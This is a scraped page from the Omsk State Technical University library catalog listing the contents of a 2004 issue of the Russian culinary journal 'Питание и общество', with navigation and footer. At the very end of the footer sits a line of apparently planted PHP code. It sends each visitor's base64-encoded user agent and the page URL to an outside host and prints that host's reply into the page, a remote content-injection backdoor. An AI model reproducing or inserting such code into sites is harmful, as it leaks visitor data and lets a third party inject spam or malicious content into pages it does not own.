Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

155 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=CFDA4563-723F-695E-1AC1-9A1045B26252/2004/11$")И(("Ключевые слова=гостов"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
CFDA4563-723F-695E-1AC1-9A1045B26252/2004/11
(Нет сведений об экземплярах)
Шифр: CFDA4563-723F-695E-1AC1-9A1045B26252/2004/11
Журнал
Питание и общество [Текст] : проф. кулинар. журн./ Межрегион. Ассоц. кулинаров России. - М. : Б. и., 1928 - . - ISSN 08694058. - Выходит ежемесячно
2004г. N 11
Содержание:
На Всемирной кулинарной Олимпиаде (YKA) в Германии (г. Эрфурт)
Обязательная сертификация услуг - отменена, продукции - еще действует. - С.2
Технические регламенты. Что это такое, и в чем их отличие от ГОСТов?. - С.2-3
Теплая у нее душа / Ю. Самойлов. - С.3-5
"Хочешь сала - марш на фронт! " / А. Константинов. - С.6-7
Русский повар / Н. Кардаков. - С.8-9
"Космосу" - космических успехов! / Н. Мироевская. - С.10
Золотая медаль. - С.10
Диплом победителя - "Дружбе" / Ю. Самойлов. - С.10
Закон о малом бизнесе будет изменен, но сохранен / М. Юлин. - С.11
Первая межрегиональная конференция по проблемам хлебопечения Северо-Западного федерального округа. - С.12-13
Приготовил Олег Ильин. - С.14-15
Рисуем фруктово-ягодной палитрой. Аленький цветочек из арбуза / Е. В. Мороз. - С.16
Удержания из заработной платы. - С.16-17
Документальное подтверждение расходов. - С.16-17
Лепка из марципана / Е. Сучкова. - С.17
Рыбные котлеты: как сделать их полезнее / С. Доценко, Е. Стаценко. - С.18-19
Масляные и яично-масляные соусы / В. Бражник. - С.19
Союз кулинарии и...футбола. - С.20-21
"БелПродукт - 2004". - С.21
Изделия Открытого Чемпионата России по кондитерскому искусству. - С.22
Восполнили дефицит общения. И не только. - С.23
Новости из Интернета. - С.24
Безопасность продуктов / Е. Румянцева. - С.25-26
Подготовка зала / Л. Кучер, Л. Шкуратова. - С.26-27
Как разработать бизнес-план? Самоучитель / Е. Румянцева. - С.28-29
Из глубины веков / Н. И. Ковалев, М. Н. Куткина, Н. Я. Карцева. - С.30-31
Искусство кулинаров "Газпрома"
Нет сведений об экземплярах
Держатели документа:
Научная библиотека Омского государственного технического университета : Россия, 644050, г. Омск, проспект Мира, 11
Оглавление 
  • На Всемирной кулинарной Олимпиаде (YKA) в Германии (г. Эрфурт)
  • Обязательная сертификация услуг - отменена, продукции - еще действует. - с.2
  • Технические регламенты. Что это такое, и в чем их отличие от ГОСТов?. - с.2-3
  • Самойлов, Ю. Теплая у нее душа / Ю. Самойлов. - с.3-5
  • Константинов, А. "Хочешь сала - марш на фронт! " / А. Константинов. - с.6-7
  • Кардаков, Н. Русский повар / Н. Кардаков. - с.8-9
  • Мироевская, Н. "Космосу" - космических успехов! / Н. Мироевская. - с.10
  • Золотая медаль. - с.10
  • Самойлов, Ю. Диплом победителя - "Дружбе" / Ю. Самойлов. - с.10
  • Юлин, М. Закон о малом бизнесе будет изменен, но сохранен / М. Юлин. - с.11
  • Первая межрегиональная конференция по проблемам хлебопечения Северо-Западного федерального округа. - с.12-13
  • Приготовил Олег Ильин. - с.14-15
  • Мороз, Евгений. Рисуем фруктово-ягодной палитрой. Аленький цветочек из арбуза / Е. В. Мороз. - с.16
  • Удержания из заработной платы. - с.16-17
  • Документальное подтверждение расходов. - с.16-17
  • Сучкова, Е. Лепка из марципана / Е. Сучкова. - с.17
  • Доценко, С. Рыбные котлеты: как сделать их полезнее / С. Доценко, Е. Стаценко. - с.18-19
  • Бражник, В. Масляные и яично-масляные соусы / В. Бражник. - с.19
  • Союз кулинарии и...футбола. - с.20-21
  • "БелПродукт - 2004". - с.21
  • Изделия Открытого Чемпионата России по кондитерскому искусству. - с.22
  • Восполнили дефицит общения. И не только. - с.23
  • Новости из Интернета. - с.24
  • Румянцева, Е. Безопасность продуктов / Е. Румянцева. - с.25-26
  • Кучер, Л. Подготовка зала / Л. Кучер, Л. Шкуратова. - с.26-27
  • Румянцева, Е. Как разработать бизнес-план? Самоучитель / Е. Румянцева. - с.28-29
  • Ковалев, Н. И. Из глубины веков / Н. И. Ковалев, М. Н. Куткина, Н. Я. Карцева. - с.30-31
  • Искусство кулинаров "Газпрома"
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3150 - 24.01.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.16 с.14 запросов, 1.00c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;